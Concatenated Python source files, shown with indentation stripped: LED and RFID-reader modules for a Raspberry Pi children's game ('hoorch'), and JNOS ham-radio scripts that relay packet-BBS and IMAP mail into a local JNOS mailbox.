#### File: jimsio/hoorch/leds.py
```python
import threading
import RPi.GPIO as GPIO
import time
import random
#LEDS
GPIO.setmode(GPIO.BCM) #= GPIO pins (BCM)
GPIO.setwarnings(False)
led_pins = [23,18,17,12,7,8]#= GPIO pins (BCM)
led = []
led_value = [0,0,0,0,0,0]
#rotate_timer = None
random_timer = False
def init():
global led
for led_pin in led_pins:
GPIO.setup(led_pin,GPIO.OUT)
#l = GPIO.PWM(led_pin,100)
#l.start(100)
#led.append(l)
check_status()
randomer()
def reset():
global led_value
led_value = [0,0,0,0,0,0]
def check_status():
leds_timer = threading.Timer(0.05,check_status).start()
for i in range(0,6):
GPIO.output(led_pins[i], led_value[i])
#rotate through all leds one whole circle/round, time per led in seconds
def rotate_one_round(time_per_led):
global led_value
for i in range(0,6):
reset()
led_value[i] = 1
time.sleep(time_per_led)
reset()
def randomer():
global random_timer
threading.Timer(0.25,randomer).start()
if random_timer:
for index,i in enumerate(led_value):
led_value[index] = random.randint(0,1)
#not used
#TODO : implement as threaded timer - so it can be stopped
def rotate_timer(time_until_end, start_position):
time_per_led = time_until_end / 6
global led_value
led_value = [1,1,1,1,1,1]
for x in range(0,5):
position = start_position+x
if position > 5:
position -= 5
led_value[x] = 0
time.sleep(time_per_led)
#not used
#rotate leds
rotate_led = 0
def rotate():
global rotate_led
global rotate_timer
rotate_timer = threading.Timer(0.2,rotate).start()
for index,i in enumerate(led_value):
if index == rotate_led:
led_value[index] = 1
else:
led_value[index] = 0
rotate_led += 1
if rotate_led > 5:
rotate_led = 0
```
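For reference, a hedged sketch of how the game modules above (e.g. einmaleins.py) drive this LED module through the shared `led_value` list; it only runs on the Raspberry Pi with the LEDs wired to the configured pins:

```python
import time
import leds

leds.init()                  # starts the 50 ms refresh timer (check_status)
leds.reset()                 # all LEDs off
leds.led_value[2] = 1        # light the LED on field 3
time.sleep(2)
leds.rotate_one_round(0.5)   # chase once around the board, 0.5 s per LED
leds.reset()
```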
#### File: jimsio/hoorch/rfidreaders.py
```python
import board
import threading
import busio
from adafruit_pn532.spi import PN532_SPI
import digitalio
from digitalio import DigitalInOut
import RPi.GPIO as GPIO
import time
import os
import unicodedata
import audio
#GPIO pin assignment
#Reader 1: Pin18 - GPIO24
#Reader 2: Pin15 - GPIO22
#Reader 3: Pin7 - GPIO4
#Reader 4: Pin37 - GPIO26
#Reader 5: Pin13 - GPIO27
#Reader 6: Pin40 - GPIO21
reader1_pin = DigitalInOut(board.D24)
reader2_pin = DigitalInOut(board.D22)
reader3_pin = DigitalInOut(board.D4)
reader4_pin = DigitalInOut(board.D26)
reader5_pin = DigitalInOut(board.D27)
reader6_pin = DigitalInOut(board.D21)
readers = []
tags = []
timer = [0,0,0,0,0,0]
figures_db = {} #figure database is a dictionary with tag id and tag name stored, based on predefined figure_db.txt. figure_db.txt is created when configuring HOORCH for the first time
gamer_figures = [] #ritter, koenigin,...
animal_figures = [] #Loewe2, Elefant1, ...
endofmessage = "#" #chr(35)
def init():
print("initialize the rfid readers and figure_db.txt")
spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
global readers
readers.append(PN532_SPI(spi, reader1_pin, debug=False))
readers.append(PN532_SPI(spi, reader2_pin, debug=False))
readers.append(PN532_SPI(spi, reader3_pin, debug=False))
readers.append(PN532_SPI(spi, reader4_pin, debug=False))
readers.append(PN532_SPI(spi, reader5_pin, debug=False))
readers.append(PN532_SPI(spi, reader6_pin, debug=False))
for n, reader in enumerate(readers):
#ic, ver, rev, support = reader.firmware_version
#print('Found Reader '+str(n)+' with firmware version: {0}.{1}'.format(ver, rev, support))
reader.SAM_configuration()
print('Initialized and configured RFID/NFC reader '+str(n+1))
tags.append(None)
#init figure db
path = "./figure_db.txt"
global gamer_figures
global animal_figures
if os.path.exists(path):
file = open(path, mode="r", encoding="utf-8")
figures_id_name = file.readlines()
file.close()
section = 0
for uid_name in figures_id_name:
#a line starting with ";" marks a section change
if uid_name.startswith(";"):
section += 1
else:
(key, val) = uid_name.split(";")
figures_db[key] = val[:val.find("\n")]
if section == 2:
gamer_figures.append(uid_name[uid_name.find(";")+1:uid_name.find("\n")])
elif section == 3:
animal_figures.append(uid_name[uid_name.find(";")+1:uid_name.find("\n")-1])
continuous_read()
def continuous_read():
global readers
global tags
global gamer_figures
for index, r in enumerate(readers):
mifare = False
tag_uid = r.read_passive_target(timeout=0.2)
#safe energy - breaks reading of some readers
#r.power_down()
if tag_uid:
#convert byte_array tag_uid to string id_readable: 4-7-26-160
id_readable = ""
for counter, number in enumerate(tag_uid):
if counter < 4:
id_readable += str(number)+"-"
else:
id_readable = id_readable[:-1]
break
#reader has issues with reading mifare cards, stick with the tag_uid
if id_readable.endswith("-"):
#print("mifare chip!")#
id_readable = id_readable[:-1]
mifare = True
#check if tag id in figure db
try:
tag_name = figures_db[id_readable]
#id_readable is not in figures_db
except:
#reader has issues with reading mifare cards, stick with the tag_uid, dont read the tag content
if mifare:
tag_name = id_readable
else:
#read tag content to get the tag name
read_message = ""
breaker = False
try:
for i in range(7,14):
block = r.ntag2xx_read_block(i)
#print(block)
for character in block:
if character != ord(endofmessage):
read_message += chr(character)
else:
breaker = True
break
if breaker:
break
#if tag was removed before it was properly read
except TypeError:
print("Error while reading RFID-tag content. Tag was probably removed before reading was completed.")
audio.play_full("TTS",199) #Die Figur konnte nicht erkannt werden. Lass sie länger auf dem Feld stehen.
break
#remove unicode control characters from read string
read_message = "".join(ch for ch in read_message if unicodedata.category(ch)[0]!="C")
# enADMIN; - remove en at beginning
tag_name = read_message[2:]
#if a figure (i.e. Affe,1 or koenigin) from another game (i.e. as a replacement of a lost one) that is already defined in this game is used
#add another key value pair to the figures_db database
if tag_name in figures_db:
figures_db[id_readable] = tag_name
#elif tag_name.startswith("ADMIN"):
# tag_name = "ADMIN"
else:
#else set the unknown figure as a gamer figures, with the id_readable as tag_name
tag_name = id_readable
gamer_figures.append(tag_name)
print("added new unknown gamer figure to the temporary gamer_figure list")
else:
tag_name = None
# keep tags in array for 1 seconds to even out reading errors
if tag_name is None and timer[index] < time.time() :
tags[index] = tag_name #None
timer[index] = 0 #reset timer to 0
if tag_name is not None:
timer[index] = time.time()+1
tags[index] = tag_name
print(tags )
#rfidreaders_timer = threading.Timer(0.01,continuous_read).start()
rfidreaders_timer = threading.Timer(1.0,continuous_read).start()
``` |
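A hedged sketch of how the game modules consume this reader module: call `init()` once and then poll the shared `tags` list, as einmaleins.py and geschichten_aufnehmen.py do above (a Raspberry Pi with the six PN532 readers attached, and the figure_db.txt file in place, is assumed):

```python
import time
import rfidreaders

rfidreaders.init()  # configures the six PN532 readers and starts continuous_read()
while "ENDE" not in rfidreaders.tags:
    # one entry per reader, e.g. [None, 'koenigin', None, None, 'Loewe2', None]
    print(rfidreaders.tags)
    time.sleep(1)
```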
{
"source": "jimsky7/JNOS-python",
"score": 2
} |
#### File: jimsky7/JNOS-python/mailInBBS.py
```python
print('========================================================')
import email, smtplib, telnetlib, logging, os, sys
from mailConfig import *
from telnetlib import Telnet
class ExitNow(Exception):
pass
# ====================================================================================
# General items
# If set, these will override mailConfig.py settings
# LIVE = FALSE
# DEBUG = TRUE
# TELNET_HOST = '192.168.2.2'
# jnosUser = 'aa6ax'
# sysDomain = 'AA6AX'
# localSMTP = '192.168.2.2'
# localSMTPSSL = FALSE
# function to check for JNOS disconnect in common input
def checkCommon(stchk, ctchk, cschk, logchk, bcs):
# Detect when returned to JNOS
if (stchk.find( "*** connected") >= 0):
print( "*** connected")
logchk.info(bcs+"*** connected")
return
if (stchk.find("*** failure with") >= 0):
sschk = "Remote BBS connection failed, so now ending the session with JNOS."
print(sschk)
logchk.critical(bcs+sschk)
if ((stchk.find("*** reconnected to") >= 0) or (stchk.find("*** failure with") >= 0)):
sschk = "Remote BBS connection failed unexpectedly, so now ending the session with JNOS."
print(sschk)
logchk.critical(bcs+sschk)
try:
ctchk.write(b'BYE' + TELNET_EOL)
print("BYE")
logchk.info(bcs+'BYE')
# Wait for *** Connection...
# From JNOS
ctchk.read_until(b'***')
except EOFError:
if (DEBUG):
print("Telnet was closed by JNOS.")
# End telnet JNOS session
ctchk.close()
# End SMTP JNOS session
if (cschk != None):
cschk.quit()
logchk.info(bcs+'All done.')
print('All done.')
print( '========================================================')
logchk.debug(bcs+'========================================================')
exit(0)
return
cs = None
def openSMTP(cso):
# ====================================================================================
# Connect to JNOS SMTP.
# This is where messages are delivered to the JNOS mailbox(es)
# SMTP already open?
if (cso != None):
return cso
# Open the SMTP connection now
try:
if (localSMTPSSL):
cso = smtplib.SMTP_SSL(localSMTP, 465, None, None, None, 30)
else:
cso = smtplib.SMTP(localSMTP, 25)
cso.helo(sysID)
except:
print('Unable to establish an SMTP connection to JNOS.')
print('Is JNOS running?')
log.critical(BCS+'Unable to establish an SMTP connection to JNOS!')
log.critical(BCS+'Is JNOS running?')
exit(0)
return cso
# Get these from ARGV[]
ls = len(sys.argv)
if (ls < 3):
print("USAGE: <interface> <bbsaddr> [<limit>]")
exit(0)
if (ls==3):
scriptName, BBS_INTERFACE, BBS_CONNECT = sys.argv
mnlimit = 1
if (ls==4):
scriptName, BBS_INTERFACE, BBS_CONNECT, mnlimit = sys.argv
mnlimit = int(mnlimit)
ss = "Connect to {} via {} interface to retrieve up to {} messages.".format(BBS_CONNECT, BBS_INTERFACE, mnlimit)
print(ss)
BBS_INTERFACE = BBS_INTERFACE.encode()
BBS_CONNECT = BBS_CONNECT.encode()
BBS_CALLSIGN_STR= BBS_CONNECT.split(b"-")
BBS_CALLSIGN_STR= BBS_CALLSIGN_STR[0].decode()
BBS_CALLSIGN = BBS_CALLSIGN_STR.encode()
BBS_TYPE = b''
BBS_TYPE_STR = BBS_TYPE.decode()
BCS = BBS_CALLSIGN_STR.upper() + " "
while len(BCS)<8:
BCS = BCS + " "
# ====================================================================================
# Set up logging
scriptPath, scriptName = os.path.split(__file__)
scriptName = scriptName.split('.')[0]
if (DEBUG):
logLevel = logging.DEBUG
else:
logLevel = logging.INFO
try:
logFormat = '%(asctime)-15s %(message)s'
logging.basicConfig(filename=(PATH_LOGS + scriptName + DOT_LOG), level=logLevel, format=logFormat)
log = logging.getLogger(scriptName)
log.info(BCS+'========================================================')
log.info(BCS+'========================================================')
log.info(BCS+'Begin processing inbound BBS messages.')
log.info(BCS+'Connecting to {} via {}'.format(BBS_CONNECT.decode(), BBS_INTERFACE.decode()))
ss = "Will transfer up to {} messages from {} via {}.".format(mnlimit, BBS_CONNECT.decode(), BBS_INTERFACE.decode())
log.info(BCS+ss)
print(ss)
if (DEBUG):
print("Logging to {}".format(PATH_LOGS + scriptName + DOT_LOG))
except:
print('Can\'t set up log file. Maybe permissions?')
# NOTE: Continue even if no log was set up.
if (LIVE == FALSE):
print('TESTING ONLY. No messages will be deleted from the remote BBS.')
log.warning(BCS+'TESTING ONLY. No messages will be deleted from the remote BBS.')
# ====================================================================================
# Connect to JNOS command line.
# This is how we'll fire up the radio to talk to the remote BBS
try:
ct = Telnet(TELNET_HOST)
ct.open(TELNET_HOST)
except:
print( 'Unable to connect to {}.'.format(TELNET_HOST))
log.warning(BCS+'Unable to connect to {}.'.format(TELNET_HOST))
print( 'Will not be able to talk to JNOS or the remote BBS.')
log.warning(BCS+'Will not be able to talk to JNOS or the remote BBS.')
else:
print( 'Connected (telnet) to JNOS at {}'.format(TELNET_HOST))
log.info(BCS+'Connected (telnet) to JNOS at {}'.format(TELNET_HOST))
# ====================================================================================
# Log in JNOS
# Note there is irregular capitalization "logon:" and "Password" so
# instead look for only the tail of those prompts.
print(ct.read_until(b'ogin: ', JNOS_WAIT).decode('ascii'))
ct.write(TELNET_USER.encode('ascii') + TELNET_EOL)
print(ct.read_until(b'assword: ', JNOS_WAIT).decode('ascii'))
ct.write(TELNET_PASS.encode('ascii') + TELNET_EOL)
print(ct.read_until(JNOS_PROMPT, JNOS_WAIT).decode('ascii'))
print( 'JNOS login completed.')
log.info(BCS+'JNOS login completed.')
# ====================================================================================
sb = b'connect ' + BBS_INTERFACE + b' ' + BBS_CONNECT
sbd = sb.decode()
print(sbd)
log.info(BCS + sbd)
ct.write(sb + TELNET_EOL)
# ====================================================================================
# INCOMING messages?
s = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
print(s)
checkCommon(s, ct, cs, log, BCS)
# BBS type?
pLines = s.strip("\r").split("\n")
for line in pLines:
if (line.startswith("[")):
BBS_TYPE = line.strip("\n")
BBS_TYPE = BBS_TYPE.strip("\r")
break
ss = "BBS type {}".format(BBS_TYPE)
print(ss)
log.info(BCS+ss)
BBS_TYPE_STR = str(BBS_TYPE)
ct.write(b'LM' + TELNET_EOL)
log.info(BCS+'LM')
s = (ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii'))
print(s)
checkCommon(s, ct, cs, log, BCS)
mnlist = []
mnkill = []
lmLines = s.strip("\r").split("\n")
print(lmLines)
sw = FALSE
for line in lmLines:
ls = line.split(" ")
st = str(ls[0]).strip("b'")
if (len(st) == 0 or st == '\r' or st.endswith(BBS_PROMPT_STR)):
sw = FALSE
if (sw):
print("Msg: {}".format(st))
try:
msgn = int(st)
mnlist.append(msgn)
except:
msgn = 0
stu = st.upper()
if (stu.startswith("MSG") or stu.startswith("MESS")):
sw = TRUE
sl = len(mnlist)
plural = 's'
if (sl==1):
plural = ''
ss = "{} message{}.".format(sl, plural)
print (ss)
log.info(BCS+ss)
if (sl):
print(mnlist)
log.info(BCS+str(mnlist))
mncount = 0
# READ all incoming messages
for msgn in mnlist:
# Pick up a limited number of messages each time
mncount = mncount + 1
if (mncount>mnlimit):
break
# Read next message
sb = b'READ ' + bytes(str(msgn), 'ascii') + b"\n"
print(sb.decode())
ct.write(sb)
if (BBS_TYPE_STR.startswith("[ARY")):
s = ct.read_until(BBS_PROMPT_ARY, BBS_WAIT).decode('ascii')
else:
s = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
# print(s)
checkCommon(s, ct, cs, log, BCS)
# ====================================================================================
lmLines = s.strip("\r").split("\n")
mailHeaders = {'To':'', 'From':'', 'Subject':'', 'Date':''}
# Switch based on portion of msg we are processing
# 'sw' = 0 before headers
# = 1 in headers
# = 2 in body
sw = 0
i = 0
body = ""
if (DEBUG):
print(lmLines)
log.debug(BCS+str(lmLines))
ss = "########## {}".format(BBS_TYPE_STR)
if (DEBUG):
print(ss)
log.info(BCS+ss)
while (sw < 3):
# Before header: Skip empty lines; skip ====== separators
if (len(lmLines)==0):
# Ran out of content in or before any body
sw = 2
break
hl = lmLines[0]
lh = len(hl)
if (sw==0):
if ((hl=='') or (hl=='\r') or ((lh>4) and hl.startswith("==========="))):
# Ignore before headers and do not transition
hl = lmLines.pop(0)
continue
else:
# Non-blanks line transitions to header processing
sw = 1
if (DEBUG):
print(">>> transition to headers")
# Process header lines
if (sw==1):
if ((lh>4) and hl.startswith("----------")):
# Ignore in headers
hl = lmLines.pop(0)
continue
if ((lh==0) or (hl=='') or (hl=='\r')):
# Empty line signals end of headers
hl = lmLines.pop(0)
sw = 2
if (DEBUG):
print(">>> end of headers")
continue
# Process header line
hl = lmLines.pop(0).strip(" ")
lh = len(hl)
if (DEBUG):
print("Analyzing header[{}]: {}".format(lh, hl))
# Parse KPC message ID string
if (BBS_TYPE_STR.startswith("[KPC") and (lh>4) and (hl.upper().startswith("MSG#"))):
if (DEBUG):
print(">>> KPC header")
# MSG number
msgParse = hl.split(" ")
msgNum = msgParse[0].split("#")
mn = msgNum[1]
# Date
msgParse1 = hl.split(" FROM ")
msgParse1 = msgParse1[0].split(" ")
# sDate = msgParse1[1] + " " + msgParse1[2]
# convert KPC date format DD/MM/YYYY HH:MM:SS to DD MMM YYYY, HH:MM:SS
dmy = msgParse1[1].split("/")
monthWord = {"01":"Jan", "02":"Feb", "03":"Mar", "04":"Apr", "05":"May", "06":"Jun", "07":"Jul", "08":"Aug", "09":"Sep", "10":"Oct", "11":"Nov", "12":"Dec"}
sDate = dmy[1]+" "+monthWord[dmy[0]]+" "+dmy[2]+" "+msgParse1[2]
mailHeaders['Date'] = sDate
# FROM
i = msgParse.index("FROM")
msgFrom = msgParse[i+1]
mailHeaders['From'] = "{}@{}".format(msgFrom, BBS_CALLSIGN_STR)
# TO
i = msgParse.index("TO")
msgTo = msgParse[i+1]
mailHeaders['To'] = msgTo
ss = ">>> completed parsing of KPC3+ MSG header, continuing"
if (DEBUG):
print(ss)
log.debug(BCS+ss)
continue
# All other BBS types (must) send headers
if (hl.find(":")):
hla = hl.split(":",1)
# a header
hla0u = hla[0].strip('\r').upper()
if (hla0u.startswith("DATE")):
# date
mailHeaders['Date'] = hla[1].strip(' \r')
if (hla0u.startswith("MESSAGE")):
# msg number
mailHeaders['Message-Id'] = hla[1].strip(' \r')
if (hla0u.startswith("FROM")):
# from
mailHeaders['From'] = hla[1].strip(' \r')
if (hla0u.startswith("TO")):
# to
mailHeaders['To'] = hla[1].strip(' \r')
if (hla0u.startswith("SUBJECT")):
# subject
mailHeaders['Subject'] = hla[1].strip(' \r')
if (sw==2):
if (DEBUG):
print(">>> checking to@/from@")
# Avoid looping when 'To" contains '@'
# Just chop off after the '@'
# ALL incoming messages must end here and not be forwarded
i = mailHeaders['To'].find("@")
if (i>0):
sp = mailHeaders['To'].split('@')
mailHeaders['To'] = str(sp[0])
# Add BBS callsign to the 'From'
i = mailHeaders['From'].find("@")
if (i<0):
mailHeaders['From'] = mailHeaders['From'] + "@" + BBS_CALLSIGN_STR
if (DEBUG):
print(mailHeaders)
log.debug(BCS+str(mailHeaders))
if (DEBUG):
print("Body analysis >>>>>>")
# Body
body = ""
while (sw == 2):
k = len(lmLines)
if (k==0):
sw = 3
if (DEBUG):
print(">>> end of body")
break
# One or more lines remain in body
bl = lmLines.pop(0)
lb = len(bl)
# If one line remains then it's the prompt
# so don't add to body
if ((k<3) and (bl.endswith("]>") or bl.endswith(BBS_PROMPT_R_STR))):
# (All of that is kind of ad hoc. Trying to differentiate
# between an actual BBS prompt and a BBS prompt embedded
# in a message.
# Sometimes ARY-BBSs end messages with ]>\r and other
# times just with ]>
# So at the very end of incoming packet if the last line
# contains the BBS prompt, want to omit it.
sw = 3
if (DEBUG):
print(">>> body ended by prompt [{}] '{}'".format(k, bl))
else:
body = body + bl
# ensure no raw BBS prompt strings remain on incoming messages
# doesn't matter locally, but if user replies to one of these,
# this becomes safer for the ultimate recipient.
body = body.replace(BBS_PROMPT_STR, "> \r")
body = body.replace(BBS_PROMPT_N_STR, "> \n")
if (DEBUG):
print("Body below >>>>>>")
print(body)
log.debug(BCS+body)
print("Body above >>>>>>")
print( '--------------------------------------------------------')
log.debug(BCS+'--------------------------------------------------------')
moo = email.message.Message()
moo.set_type('text/plain')
for ih in mailHeaders.keys():
moo.__setitem__(ih, mailHeaders[ih])
# Add body to message. UTF-8 encoding is fine locally.
moo.set_payload(str(body).encode('utf-8'))
sentOK = TRUE
if LIVE:
print("Message {}: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(msgn, mailHeaders['From'], mailHeaders['To'], mailHeaders['Subject'], mailHeaders['Date']))
log.info(BCS+"Message {}:".format(msgn))
log.info(BCS+"From: {}".format(mailHeaders['From']))
log.info(BCS+"To: {}".format(mailHeaders['To']))
log.info(BCS+"Subject: {}".format(mailHeaders['Subject']))
log.info(BCS+"Date: {}".format(mailHeaders['Date']))
try:
cs = openSMTP(cs)
cs.send_message(moo)
sentOK = TRUE
except:
print("[SMTP] Exception when attempting to import into JNOS.")
log.warning(BCS+"[SMTP] Exception when attempting to import into JNOS.")
log.warning(BCS+"[SMTP] This message will be retried next time.")
sentOK = FALSE
else:
print("TEST ONLY: Message {} NOT imported: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(msgn, mailHeaders['From'], mailHeaders['To'], mailHeaders['Subject'], mailHeaders['Date']))
log.info(BCS+"Message {} NOT imported:".format(msgn))
log.info(BCS+"From: {}".format(mailHeaders['From']))
log.info(BCS+"To: {}".format(mailHeaders['To']))
log.info(BCS+"Subject: {}".format(mailHeaders['Subject']))
log.info(BCS+"Date: {}".format(mailHeaders['Date']))
sentOK = FALSE
if(sentOK):
if (LIVE):
ss = "KILL {}".format(msgn)
print(ss)
ct.write(ss.encode('ascii') + TELNET_EOL)
st = ct.read_until(BBS_PROMPT, BBS_WAIT).decode('ascii')
print(st)
checkCommon(st, ct, cs, log, BCS)
log.info(BCS+ss)
# List of deleted message numbers
mnkill.append(msgn)
else:
ss = "Message {} not deleted from remote BBS -- not LIVE".format(msgn)
print(ss)
log.warning(BCS+ss)
# ====================================================================================
# ====================================================================================
ct.write(b'BYE' + TELNET_EOL)
print("BYE")
log.info(BCS+'BYE')
# Wait for *** Connection...
# From JNOS
try:
ct.read_until(b'*** ')
except EOFError:
if (DEBUG):
print( "Telnet was closed by JNOS.")
log.debug(BCS+"Telnet was closed by JNOS.")
# End telnet JNOS session
ct.close()
if (cs != None):
cs.quit()
log.info(BCS+'All done.')
print( 'All done.')
print( '========================================================')
log.debug(BCS+'========================================================')
```
#### File: jimsky7/JNOS-python/mailIn.py
```python
print('========================================================')
import imaplib, email, smtplib, logging, os, sys, traceback, base64, quopri
from mailConfig import *
class ExitNow(Exception):
pass
# ====================================================================================
# General items
# If set, these will override mailConfig.py settings
# LIVE = FALSE
# DEBUG = TRUE
# ====================================================================================
# Set up logging
scriptPath, scriptName = os.path.split(__file__)
scriptName = scriptName.split(".")[0]
if (DEBUG):
logLevel = logging.DEBUG
else:
logLevel = logging.INFO
try:
logFormat = "%(asctime)-15s %(message)s"
logging.basicConfig(filename=(PATH_LOGS + scriptName + DOT_LOG), level=logLevel, format=logFormat)
log = logging.getLogger(scriptName)
log.info("========================================================")
log.info("========================================================")
log.info("Begin processing inbound Internet email.")
if (DEBUG):
print("Logging to {}".format(PATH_LOGS + scriptName + DOT_LOG))
except:
print("Can't set up log file. Maybe permissions?")
# NOTE: Continue even if no log was set up.
if (LIVE == FALSE):
print( "TESTING ONLY. No messages will be sent or archived.")
log.info("TESTING ONLY. No messages will be sent or archived.")
cs = None
def openSMTP(cso):
# ====================================================================================
# Connect to JNOS SMTP.
# This is where messages are delivered to the JNOS mailbox(es)
# SMTP already open?
if (cso != None):
return cso
# Open the SMTP connection now
try:
if (localSMTPSSL):
cso = smtplib.SMTP_SSL(localSMTP, 465, None, None, None, 30)
else:
cso = smtplib.SMTP(localSMTP, 25)
cso.helo(sysID)
except:
print("Unable to establish an SMTP connection to JNOS.")
print("Is JNOS running?")
log.critical(BCS+"Unable to establish an SMTP connection to JNOS!")
log.critical(BCS+"Is JNOS running?")
exit(0)
return cso
# ====================================================================================
# Connect to the IMAP server (remote)
# This server is where messages from the Internet are received
try:
if (mxIMAPSSL):
cp = imaplib.IMAP4_SSL(mxIMAP)
else:
cp = imaplib.IMAP4(mxIMAP)
except:
print("Unable to establish an IMAP connection with {}.".format(mxIMAP))
print("Will not be able to pick up inbound mail.")
log.warning("Unable to establish an IMAP connection with {}.".format(mxIMAP))
log.warning("Will not be able to pick up inbound mail.")
else:
print( "Connected to IMAP server at {} for inbound mail.".format(mxIMAP))
log.info("Connected to IMAP server at {} for inbound mail.".format(mxIMAP))
# Authenticate for pick up of IMAP
try:
cp.login(user, pw)
except:
print( "IMAP login failed. Credentials may be incorrect.")
log.critical("IMAP login failed.")
exit(0)
namespace = cp.namespace()
log.debug(namespace[1][0])
# ====================================================================================
# Setup for inbound
# Select INBOX messages
# Will go thru and will relay these, then move
# each one to /JNOS-archive and
# mark as deleted in INBOX.
cp.select(inbox)
typ, mnb = cp.search(None, "ALL")
mns = str(mnb)
# mnnlist will be a list of message numbers to retrieve
mnlist = mns.strip("][b'").split(" ")
nm = len(mnlist)
# Number of messages waiting
# Check for empty
if mnlist[0]=="":
print( "No new mail.")
log.info("No new mail.")
nm = 0
mnlist = []
else:
print( "{} new messages available. {}".format(nm, mns))
log.info("{} new messages available. {}".format(nm, mns))
# List of messages to be deleted
mndeleted = []
# ====================================================================================
# Process all incoming messages
for i in mnlist:
# Extract headers from incoming message
mailHeaders = {"To":"", "From":"", "Subject":"", "Date":""}
if (DEBUG):
print( "--------------------------------------------------------")
log.debug("--------------------------------------------------------")
# DEBUG print start of message
# print(cp.retr(i+1)[1])
# Get the next message.
# There's no distinction on whether message is new or old.
# If it is in INBOX, it will be processed.
# After processing, it is copied to JNOS_archive and
# marked/flagged as deleted.
typ, msg_data = cp.fetch(str(i), "(RFC822)")
# Parse the incoming email
for response_part in msg_data:
if isinstance(response_part, tuple):
parsed_email = email.message_from_bytes(response_part[1])
if (DEBUG):
for header in [ "subject", "to", "from", "date" ]:
print("%-8s: %s" % (header.upper(), parsed_email[header]))
print("--------------------------------------------------------")
mp = parsed_email.is_multipart()
log.debug("Message {} incoming: {} Multipart?: {}".format(i, parsed_email.get_default_type(), mp))
body = ""
# Get body of this email
if mp:
log.debug("Multipart")
log.debug(parsed_email.get_boundary())
body = parsed_email.get_payload(0).as_string()
# WARNING: needs quoted-printable decoded
else:
log.debug("Not multipart")
body = parsed_email.get_payload()
# WARNING: needs quoted-printable decoded
# Decode base64 if present
# (Note unreliable way to detect base64 that will fail, for instance,
# if the message just includes the string.)
try:
x64,y64,z64 = body.rpartition("Content-Transfer-Encoding: base64")
if (y64!=""):
b = base64.b64decode(z64)
print( "Message was decoded from base64 to utf-8")
log.debug("Message was decoded from base64 to utf-8")
body = b.decode("utf-8")
except:
traceback.print_tb(sys.exc_info()[2])
print( "Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.critical("Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
# Decode quoted-printable if present
# (Note unreliable way to detect quoted-printable)
try:
if (body.find("=\r") >= 0 or body.find("=20\r") >= 0):
b = quopri.decodestring(bytes(body, "utf-8"))
print( "Message was decoded from quoted-printable to utf-8")
log.debug("Message was decoded from quoted-printable to utf-8")
body = b.decode("utf-8")
except:
traceback.print_tb(sys.exc_info()[2])
print( "Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.critical("Exception: {} {}".format(sys.exc_info()[0], sys.exc_info()[1]))
log.debug("--------------------------------------------------------")
# Keep (transfer) certain headers to msg we're building
for headerKey in headersToKeep:
if headerKey in parsed_email.keys():
mailHeaders[headerKey] = parsed_email[headerKey]
# Transform the 'To:' header if an account is present
to = mailHeaders["To"]
# Strip quotes and blanks leading and trailing on the 'to' header
# Don't know exactly which, but some mailers allow them.
to = to.strip("\"' ")
log.debug("Analyzing To: {}".format(to))
# May be of the form "area@BBS" <email>
# Check any quoted part, as this may be the area/mailbox plus BBS name
s = to.split("\"")
if ((len(s)>1) and len(s[1])):
# area@BBS was explicitly set
if (jnosUser.count(".")):
# Internet forwarding has '.' in the address
mailHeaders["To"] = "\"{}\" <{}>".format(s[1].strip("\""), jnosUser.strip(" ><"))
else:
# BBS forwarding
mailHeaders["To"] = s[1].strip("\"")
else:
# area@BBS not set, use default
if (jnosUser.count(".")):
# Internet forwarding has '.' in the address
mailHeaders["To"] = "<{}>".format(jnosUser.strip(" ><"))
else:
# BBS forwarding
mailHeaders["To"] = "<{}>".format(jnosUser.strip(" ><"))
# print the final headers
for hk in mailHeaders:
log.debug(hk+": " + mailHeaders[hk])
log.debug('--------------------------------------------------------')
sw = 0
# Connect to SMTP and inject the message
#
moo = email.message.Message()
moo.set_type("text/plain")
for ih in mailHeaders.keys():
moo.__setitem__(ih, mailHeaders[ih])
moo.set_payload(str(body).encode("utf-8"))
sentOK = TRUE
if LIVE:
print( "Message {} relayed: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(i, mailHeaders["From"], mailHeaders["To"], mailHeaders["Subject"], mailHeaders["Date"]))
log.info("Message {} relayed:".format(i))
log.info("From: {}".format(mailHeaders["From"]))
log.info("To: {}".format(mailHeaders["To"]))
log.info("Subject: {}".format(mailHeaders["Subject"]))
log.info("Date: {}".format(mailHeaders["Date"]))
try:
cs = openSMTP(cs)
cs.send_message(moo)
sentOK = TRUE
except:
print( "[SMTP] Exception when attempting to send this message.")
log.warning("[SMTP] Exception when attempting to send this message.")
log.warning("[SMTP] This message will be retried.")
sentOK = FALSE
else:
print( "TEST ONLY: Message {} NOT relayed: \r\nFrom: {} \r\nTo: {}\r\nSubject: {}\r\nDate: {}".format(i, mailHeaders["From"], mailHeaders["To"], mailHeaders["Subject"], mailHeaders["Date"]))
log.info("Message {} NOT relayed:".format(i))
log.info("From: {}".format(mailHeaders["From"]))
log.info("To: {}".format(mailHeaders["To"]))
log.info("Subject: {}".format(mailHeaders["Subject"]))
log.info("Date: {}".format(mailHeaders["Date"]))
# Copy this message to the archive
log.debug("--------------------------------------------------------")
try:
# Try to create new archive (mailbox)
if (LIVE):
typ, cr = cp.create(archive)
except:
log.debug( "Message will be archived in {}.".format(archive))
else:
if (LIVE):
log.debug("Message will be archived in {}.".format(archive))
try:
if LIVE:
cp.copy(str(i), archive)
except Exception as ex:
print("Exception while attempting to archive message {} to {}.".format(i, archive))
else:
if LIVE:
log.debug("Copied message {} to {}.".format(i, archive))
else:
log.debug("TEST ONLY: Live system would copy message {} to {}.".format(i, archive))
if (sentOK):
mndeleted.append(str(i))
# ====================================================================================
# All messages relayed, now mark them Deleted from INBOX
# Note: Do this in one fell swoop after all messages have been read.
if len(mndeleted):
log.debug('========================================================')
for i in mndeleted:
if LIVE:
cp.store(str(i), "+FLAGS", "\\Deleted")
log.debug("Marked message {} deleted in {}.".format(i, inbox))
else:
log.debug("TEST ONLY: Live system would mark message {} deleted in {}.".format(i, inbox))
# ====================================================================================
# Everything relayed, close connections
cp.logout()
if (cs != None):
cs.quit()
log.info("All done.")
